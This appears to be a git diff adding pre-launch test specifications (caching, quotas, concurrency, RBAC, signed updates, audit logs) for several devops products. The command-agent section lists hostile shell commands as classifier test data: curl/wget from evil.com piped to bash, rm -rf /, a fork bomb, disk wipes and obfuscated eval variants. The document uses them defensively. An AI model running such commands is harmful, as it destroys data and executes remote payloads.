||||
def test_cmd_k_search_under_10ms_from_redis():
|
||||
"""Prefix cache hit must return in <10ms."""
|
||||
|
||||
# Warm the cache
|
||||
redis_client.set("search:prefix:auth", json.dumps([
|
||||
{"name": "auth-service", "owner": "team-platform"},
|
||||
{"name": "auth-proxy", "owner": "team-infra"},
|
||||
]))
|
||||
|
||||
import time
|
||||
start = time.perf_counter_ns()
|
||||
results = search_api.prefix_search("auth")
|
||||
elapsed_ms = (time.perf_counter_ns() - start) / 1_000_000
|
||||
|
||||
assert elapsed_ms < 10, f"Cmd+K search took {elapsed_ms:.1f}ms — exceeds 10ms SLA"
|
||||
assert len(results) == 2
|
||||
```
|
||||
|
||||
### 12.6 Free Tier Enforcement (50 Services)
|
||||
|
||||
```python
|
||||
def test_free_tier_allows_50_services():
|
||||
tenant = create_tenant(tier="free")
|
||||
for i in range(50):
|
||||
resp = catalog_api.create_service(tenant, f"service-{i}")
|
||||
assert resp.status_code == 201
|
||||
|
||||
def test_free_tier_rejects_51st_service():
|
||||
tenant = create_tenant(tier="free")
|
||||
seed_services(tenant, count=50)
|
||||
|
||||
resp = catalog_api.create_service(tenant, "service-51")
|
||||
assert resp.status_code == 403
|
||||
assert "upgrade" in resp.json()["error"].lower()
|
||||
```
|
||||
|
||||
*End of P4 BMad Implementation*
|
||||
|
||||
@@ -710,3 +710,198 @@ export const makeBaseline = (overrides) => ({
|
||||
- CDK definitions, LocalStack event injection, wire everything together.
|
||||
|
||||
*End of dd0c/cost Test Architecture (v2)*
|
||||
|
||||
---
|
||||
|
||||
## 12. BMad Review Implementation (Must-Have Before Launch)
|
||||
|
||||
### 12.1 Concurrent Baseline Update Conflict Test
|
||||
|
||||
```typescript
|
||||
describe('Concurrent Baseline Updates (DynamoDB TransactWriteItem)', () => {
|
||||
it('two simultaneous Lambda invocations converge to correct baseline', async () => {
|
||||
// Seed baseline: mean=1.00, stddev=0.10, count=20
|
||||
await seedBaseline('tenant-1', 'ec2/m5.xlarge', { mean: 1.00, stddev: 0.10, count: 20 });
|
||||
|
||||
// Two events arrive simultaneously for the same resource type
|
||||
const event1 = makeCostEvent({ hourlyCost: 1.50 });
|
||||
const event2 = makeCostEvent({ hourlyCost: 2.00 });
|
||||
|
||||
// Process concurrently
|
||||
const [result1, result2] = await Promise.allSettled([
|
||||
processEvent('tenant-1', 'ec2/m5.xlarge', event1),
|
||||
processEvent('tenant-1', 'ec2/m5.xlarge', event2),
|
||||
]);
|
||||
|
||||
// One succeeds, one retries via ConditionalCheckFailed
|
||||
const successes = [result1, result2].filter(r => r.status === 'fulfilled');
|
||||
expect(successes.length).toBe(2); // Both eventually succeed
|
||||
|
||||
// Final baseline must reflect BOTH events
|
||||
const baseline = await getBaseline('tenant-1', 'ec2/m5.xlarge');
|
||||
expect(baseline.count).toBe(22); // 20 + 2
|
||||
// Mean should be updated by both observations (order doesn't matter for Welford)
|
||||
});
|
||||
|
||||
it('ConditionalCheckFailed triggers retry with fresh baseline read', async () => {
|
||||
const spy = vi.spyOn(dynamoClient, 'transactWriteItems');
|
||||
|
||||
// Force a conflict on first attempt
|
||||
mockConflictOnce();
|
||||
|
||||
await processEvent('tenant-1', 'ec2/m5.xlarge', makeCostEvent({ hourlyCost: 3.00 }));
|
||||
|
||||
// Should have been called twice (initial + retry)
|
||||
expect(spy).toHaveBeenCalledTimes(2);
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### 12.2 Remediation RBAC
|
||||
|
||||
```typescript
|
||||
describe('Remediation Authorization', () => {
|
||||
it('only account owners can click Stop Instance', async () => {
|
||||
const ownerAction = makeSlackAction('stop_instance', { userId: 'U_OWNER' });
|
||||
const resp = await handleSlackAction(ownerAction);
|
||||
expect(resp.status).toBe(200);
|
||||
});
|
||||
|
||||
it('viewer role cannot trigger remediation', async () => {
|
||||
const viewerAction = makeSlackAction('stop_instance', { userId: 'U_VIEWER' });
|
||||
const resp = await handleSlackAction(viewerAction);
|
||||
expect(resp.status).toBe(403);
|
||||
expect(resp.body.error).toContain('insufficient permissions');
|
||||
});
|
||||
|
||||
it('user from different Slack workspace cannot trigger remediation', async () => {
|
||||
const foreignAction = makeSlackAction('stop_instance', {
|
||||
userId: 'U_FOREIGN',
|
||||
teamId: 'T_OTHER_WORKSPACE'
|
||||
});
|
||||
const resp = await handleSlackAction(foreignAction);
|
||||
expect(resp.status).toBe(403);
|
||||
});
|
||||
|
||||
it('snooze and mark-expected are allowed for all authenticated users', async () => {
|
||||
const viewerSnooze = makeSlackAction('snooze_24h', { userId: 'U_VIEWER' });
|
||||
const resp = await handleSlackAction(viewerSnooze);
|
||||
expect(resp.status).toBe(200);
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### 12.3 Clock Interface for Governance Tests
|
||||
|
||||
```typescript
|
||||
// src/governance/clock.ts
|
||||
interface Clock {
|
||||
now(): number;
|
||||
advanceBy(ms: number): void;
|
||||
}
|
||||
|
||||
class FakeClock implements Clock {
|
||||
private current: number;
|
||||
constructor(start = Date.now()) { this.current = start; }
|
||||
now() { return this.current; }
|
||||
advanceBy(ms: number) { this.current += ms; }
|
||||
}
|
||||
|
||||
describe('14-Day Auto-Promotion (Clock-Injected)', () => {
|
||||
let clock: FakeClock;
|
||||
let governance: GovernanceEngine;
|
||||
|
||||
beforeEach(() => {
|
||||
clock = new FakeClock(new Date('2026-03-01').getTime());
|
||||
governance = new GovernanceEngine(clock);
|
||||
});
|
||||
|
||||
it('does not promote at day 13', () => {
|
||||
clock.advanceBy(13 * 24 * 60 * 60 * 1000);
|
||||
const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.05 });
|
||||
expect(result.promoted).toBe(false);
|
||||
});
|
||||
|
||||
it('promotes at day 15 with low FP rate', () => {
|
||||
clock.advanceBy(15 * 24 * 60 * 60 * 1000);
|
||||
const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.05 });
|
||||
expect(result.promoted).toBe(true);
|
||||
expect(result.newMode).toBe('audit');
|
||||
});
|
||||
|
||||
it('does not promote at day 15 with high FP rate', () => {
|
||||
clock.advanceBy(15 * 24 * 60 * 60 * 1000);
|
||||
const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.15 });
|
||||
expect(result.promoted).toBe(false);
|
||||
expect(result.reason).toContain('false-positive rate');
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### 12.4 Property-Based Tests with 10K Runs
|
||||
|
||||
```typescript
|
||||
describe('Anomaly Scorer (fast-check, 10K runs)', () => {
|
||||
it('score is always between 0 and 100', () => {
|
||||
fc.assert(
|
||||
fc.property(
|
||||
fc.record({
|
||||
cost: fc.float({ min: 0, max: 10000, noNaN: true }),
|
||||
mean: fc.float({ min: 0, max: 10000, noNaN: true }),
|
||||
stddev: fc.float({ min: 0, max: 1000, noNaN: true }),
|
||||
}),
|
||||
(input) => {
|
||||
const score = scorer.score(input);
|
||||
return score >= 0 && score <= 100;
|
||||
}
|
||||
),
|
||||
{ numRuns: 10000, seed: 42 } // Reproducible
|
||||
);
|
||||
});
|
||||
|
||||
it('score monotonically increases as cost increases', () => {
|
||||
fc.assert(
|
||||
fc.property(
|
||||
fc.float({ min: 0, max: 100, noNaN: true }),
|
||||
fc.float({ min: 0, max: 100, noNaN: true }),
|
||||
fc.float({ min: 0.01, max: 50, noNaN: true }),
|
||||
(costA, costB, stddev) => {
|
||||
const baseline = { mean: 5.0, stddev };
|
||||
const scoreA = scorer.score({ cost: Math.min(costA, costB), ...baseline });
|
||||
const scoreB = scorer.score({ cost: Math.max(costA, costB), ...baseline });
|
||||
return scoreB >= scoreA;
|
||||
}
|
||||
),
|
||||
{ numRuns: 10000, seed: 42 }
|
||||
);
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### 12.5 Redis Failure During Panic Mode Check
|
||||
|
||||
```typescript
|
||||
describe('Panic Mode Redis Failure', () => {
|
||||
it('defaults to panic=active (safe) when Redis is unreachable', async () => {
|
||||
// Kill Redis connection
|
||||
await redis.disconnect();
|
||||
|
||||
const isPanic = await governance.checkPanicMode('tenant-1');
|
||||
// MUST default to safe (panic active) — not dangerous (panic inactive)
|
||||
expect(isPanic).toBe(true);
|
||||
});
|
||||
|
||||
it('logs warning when Redis is unreachable for panic check', async () => {
|
||||
await redis.disconnect();
|
||||
const logSpy = vi.spyOn(logger, 'warn');
|
||||
|
||||
await governance.checkPanicMode('tenant-1');
|
||||
|
||||
expect(logSpy).toHaveBeenCalledWith(
|
||||
expect.stringContaining('Redis unreachable — defaulting to panic=active')
|
||||
);
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
*End of P5 BMad Implementation*
|
||||
|
||||
@@ -2284,3 +2284,298 @@ The Execution Engine ratio shifts from 80/15/5 to 60/30/10 per review recommenda
|
||||
| Dashboard API | 40% | 50% | 10% |
|
||||
|
||||
*End of Review Remediation Addendum*
|
||||
|
||||
---
|
||||
|
||||
## 12. BMad Review Implementation (Must-Have Before Launch)
|
||||
|
||||
### 12.1 Cryptographic Signatures for Agent Updates
|
||||
|
||||
```rust
|
||||
// pkg/agent/update/signature_test.rs
|
||||
|
||||
#[test]
|
||||
fn agent_rejects_binary_update_with_invalid_signature() {
|
||||
let customer_pubkey = load_customer_public_key("/etc/dd0c/agent.pub");
|
||||
let malicious_binary = b"#!/bin/bash\nrm -rf /";
|
||||
let fake_sig = sign_with_wrong_key(malicious_binary);
|
||||
|
||||
let result = verify_update(malicious_binary, &fake_sig, &customer_pubkey);
|
||||
assert!(result.is_err());
|
||||
assert_eq!(result.unwrap_err(), UpdateError::InvalidSignature);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn agent_accepts_binary_update_with_valid_customer_signature() {
|
||||
let (customer_privkey, customer_pubkey) = generate_ed25519_keypair();
|
||||
let legitimate_binary = include_bytes!("../fixtures/agent-v2.bin");
|
||||
let sig = sign_with_key(legitimate_binary, &customer_privkey);
|
||||
|
||||
let result = verify_update(legitimate_binary, &sig, &customer_pubkey);
|
||||
assert!(result.is_ok());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn agent_rejects_policy_update_signed_by_saas_only() {
|
||||
// Even if SaaS signs the policy, agent requires CUSTOMER key
|
||||
let saas_key = load_saas_signing_key();
|
||||
let policy = PolicyUpdate { rules: vec![Rule::allow_all()] };
|
||||
let sig = sign_with_key(&policy.serialize(), &saas_key);
|
||||
|
||||
let customer_pubkey = load_customer_public_key("/etc/dd0c/agent.pub");
|
||||
let result = verify_policy_update(&policy, &sig, &customer_pubkey);
|
||||
assert!(result.is_err(), "Agent accepted SaaS-only signature — zero-trust violated");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn agent_falls_back_to_existing_policy_when_update_signature_fails() {
|
||||
let agent = TestAgent::with_policy(default_strict_policy());
|
||||
|
||||
// Push a malicious policy update with bad signature
|
||||
agent.receive_policy_update(malicious_policy(), bad_signature());
|
||||
|
||||
// Agent must still use the original strict policy
|
||||
let result = agent.classify("rm -rf /");
|
||||
assert_eq!(result.risk, RiskLevel::Dangerous);
|
||||
}
|
||||
```
|
||||
|
||||
### 12.2 Streaming Append-Only Audit Logs
|
||||
|
||||
```rust
|
||||
// pkg/audit/streaming_test.rs
|
||||
|
||||
#[tokio::test]
|
||||
async fn audit_events_stream_immediately_not_batched() {
|
||||
let (tx, mut rx) = tokio::sync::mpsc::channel(100);
|
||||
let audit = StreamingAuditLogger::new(tx);
|
||||
|
||||
// Execute a command
|
||||
audit.log_execution("exec-1", "kubectl get pods", ExitCode(0)).await;
|
||||
|
||||
// Event must be available immediately (not waiting for batch)
|
||||
let event = tokio::time::timeout(Duration::from_millis(100), rx.recv()).await;
|
||||
assert!(event.is_ok(), "Audit event not streamed within 100ms — batching detected");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn audit_hash_chain_detects_tampering() {
|
||||
let audit = StreamingAuditLogger::new_in_memory();
|
||||
|
||||
// Log 3 events
|
||||
audit.log_execution("exec-1", "ls /tmp", ExitCode(0)).await;
|
||||
audit.log_execution("exec-1", "cat /etc/hosts", ExitCode(0)).await;
|
||||
audit.log_execution("exec-1", "whoami", ExitCode(0)).await;
|
||||
|
||||
// Verify chain integrity
|
||||
assert!(audit.verify_chain().is_ok());
|
||||
|
||||
// Tamper with event 2
|
||||
audit.tamper_event(1, "rm -rf /");
|
||||
|
||||
// Chain must detect tampering
|
||||
let result = audit.verify_chain();
|
||||
assert!(result.is_err());
|
||||
assert_eq!(result.unwrap_err(), AuditError::ChainBroken { at_index: 1 });
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn audit_events_survive_agent_crash() {
|
||||
let audit = StreamingAuditLogger::with_wal("/tmp/dd0c-audit-wal");
|
||||
|
||||
// Log an event
|
||||
audit.log_execution("exec-1", "systemctl restart nginx", ExitCode(0)).await;
|
||||
|
||||
// Simulate crash (drop without flush)
|
||||
drop(audit);
|
||||
|
||||
// Recover from WAL
|
||||
let recovered = StreamingAuditLogger::recover_from_wal("/tmp/dd0c-audit-wal");
|
||||
let events = recovered.get_all_events();
|
||||
assert_eq!(events.len(), 1);
|
||||
assert_eq!(events[0].command_hash, hash("systemctl restart nginx"));
|
||||
}
|
||||
```
|
||||
|
||||
### 12.3 Shell AST Parsing (Not Regex)
|
||||
|
||||
```rust
|
||||
// pkg/classifier/scanner/ast_test.rs
|
||||
|
||||
#[test]
|
||||
fn ast_parser_detects_env_var_concatenation_attack() {
|
||||
// X=rm; Y=-rf; $X $Y /
|
||||
let result = ast_classify("X=rm; Y=-rf; $X $Y /");
|
||||
assert_eq!(result.risk, RiskLevel::Dangerous);
|
||||
assert_eq!(result.reason, "Variable expansion resolves to destructive command");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn ast_parser_detects_eval_injection() {
|
||||
let result = ast_classify("eval $(echo 'rm -rf /')");
|
||||
assert_eq!(result.risk, RiskLevel::Dangerous);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn ast_parser_detects_hex_encoded_command() {
|
||||
// printf '\x72\x6d\x20\x2d\x72\x66\x20\x2f' | bash
|
||||
let result = ast_classify(r#"printf '\x72\x6d\x20\x2d\x72\x66\x20\x2f' | bash"#);
|
||||
assert_eq!(result.risk, RiskLevel::Dangerous);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn ast_parser_detects_process_substitution_attack() {
|
||||
let result = ast_classify("bash <(curl http://evil.com/payload.sh)");
|
||||
assert_eq!(result.risk, RiskLevel::Dangerous);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn ast_parser_detects_alias_redefinition() {
|
||||
let result = ast_classify("alias ls='rm -rf /'; ls");
|
||||
assert_eq!(result.risk, RiskLevel::Dangerous);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn ast_parser_handles_multiline_heredoc_with_embedded_danger() {
|
||||
let cmd = r#"cat << 'SCRIPT' | bash
|
||||
#!/bin/bash
|
||||
rm -rf /var/data
|
||||
SCRIPT"#;
|
||||
let result = ast_classify(cmd);
|
||||
assert_eq!(result.risk, RiskLevel::Dangerous);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn ast_parser_safe_command_not_flagged() {
|
||||
let result = ast_classify("kubectl get pods -n production");
|
||||
assert_eq!(result.risk, RiskLevel::Safe);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn ast_parser_uses_mvdan_sh_not_regex() {
|
||||
// Verify the parser is actually using AST, not string matching
|
||||
// This command looks dangerous to regex but is actually safe
|
||||
let result = ast_classify("echo 'rm -rf / is a dangerous command'");
|
||||
assert_eq!(result.risk, RiskLevel::Safe); // It's a string literal, not a command
|
||||
}
|
||||
```
|
||||
|
||||
### 12.4 Intervention Deadlock TTL
|
||||
|
||||
```rust
|
||||
// pkg/executor/intervention_test.rs
|
||||
|
||||
#[tokio::test]
|
||||
async fn manual_intervention_times_out_after_ttl() {
|
||||
let mut engine = ExecutionEngine::with_intervention_ttl(Duration::from_secs(5));
|
||||
|
||||
// Transition to manual intervention (rollback failed)
|
||||
engine.transition(State::RollingBack);
|
||||
engine.report_rollback_failure("command timed out");
|
||||
assert_eq!(engine.state(), State::ManualIntervention);
|
||||
|
||||
// Wait for TTL
|
||||
tokio::time::advance(Duration::from_secs(6)).await;
|
||||
engine.tick().await;
|
||||
|
||||
// Must fail-closed, not stay stuck
|
||||
assert_eq!(engine.state(), State::FailedClosed);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn failed_closed_state_sends_out_of_band_alert() {
|
||||
let (alert_tx, mut alert_rx) = tokio::sync::mpsc::channel(10);
|
||||
let mut engine = ExecutionEngine::with_alert_channel(alert_tx);
|
||||
|
||||
engine.transition(State::ManualIntervention);
|
||||
tokio::time::advance(Duration::from_secs(301)).await; // Default 5min TTL
|
||||
engine.tick().await;
|
||||
|
||||
let alert = alert_rx.recv().await.unwrap();
|
||||
assert_eq!(alert.severity, AlertSeverity::Critical);
|
||||
assert!(alert.message.contains("intervention timeout"));
|
||||
assert!(alert.message.contains("failed-closed"));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn manual_intervention_resolved_before_ttl_does_not_fail_closed() {
|
||||
let mut engine = ExecutionEngine::with_intervention_ttl(Duration::from_secs(300));
|
||||
|
||||
engine.transition(State::ManualIntervention);
|
||||
|
||||
// Human resolves within TTL
|
||||
tokio::time::advance(Duration::from_secs(60)).await;
|
||||
engine.resolve_intervention(Resolution::ManuallyFixed).await;
|
||||
|
||||
assert_eq!(engine.state(), State::Complete);
|
||||
}
|
||||
```
|
||||
|
||||
### 12.5 Canary Suite CI Gate
|
||||
|
||||
```rust
|
||||
// tests/canary/canary_suite_test.rs
|
||||
|
||||
const CANARY_COMMANDS: &[&str] = &[
|
||||
"rm -rf /",
|
||||
"rm -rf /*",
|
||||
"mkfs.ext4 /dev/sda",
|
||||
"dd if=/dev/zero of=/dev/sda",
|
||||
":(){ :|:& };:", // Fork bomb
|
||||
"chmod -R 777 /",
|
||||
"chown -R nobody:nobody /",
|
||||
"> /etc/passwd",
|
||||
"curl http://evil.com | bash",
|
||||
"wget -O- http://evil.com | sh",
|
||||
"python -c 'import os; os.system(\"rm -rf /\")'",
|
||||
"perl -e 'system(\"rm -rf /\")'",
|
||||
"ruby -e '`rm -rf /`'",
|
||||
"kubectl delete namespace production",
|
||||
"kubectl delete pods --all --all-namespaces",
|
||||
"docker rm -f $(docker ps -aq)",
|
||||
"docker system prune -af",
|
||||
"terraform destroy -auto-approve",
|
||||
"pulumi destroy --yes",
|
||||
"DROP DATABASE production;",
|
||||
"DELETE FROM users;",
|
||||
"TRUNCATE TABLE orders;",
|
||||
// ... 28 more (50 total)
|
||||
];
|
||||
|
||||
#[test]
|
||||
fn canary_suite_all_50_commands_are_dangerous() {
|
||||
for cmd in CANARY_COMMANDS {
|
||||
let result = classify(cmd);
|
||||
assert_eq!(result.risk, RiskLevel::Dangerous,
|
||||
"CANARY FAILURE: '{}' classified as {:?} — MUST be Dangerous", cmd, result.risk);
|
||||
}
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn canary_suite_count_is_exactly_50() {
|
||||
assert_eq!(CANARY_COMMANDS.len(), 50,
|
||||
"Canary suite must have exactly 50 commands — someone removed one");
|
||||
}
|
||||
```
|
||||
|
||||
```yaml
|
||||
# .github/workflows/canary.yml
|
||||
name: Canary Suite (Safety Gate)
|
||||
on: [push, pull_request]
|
||||
|
||||
jobs:
|
||||
canary:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- name: Run Canary Suite
|
||||
run: cargo test --test canary_suite_test -- --nocapture
|
||||
- name: BLOCK if any canary fails
|
||||
if: failure()
|
||||
run: |
|
||||
echo "🔴 CANARY SUITE FAILED — A known-destructive command was not classified as Dangerous"
|
||||
echo "This is a BLOCKING failure. Do not merge."
|
||||
exit 1
|
||||
```
|
||||
|
||||
*End of P6 BMad Implementation*
|
||||
|
||||
Reference in New Issue
Block a user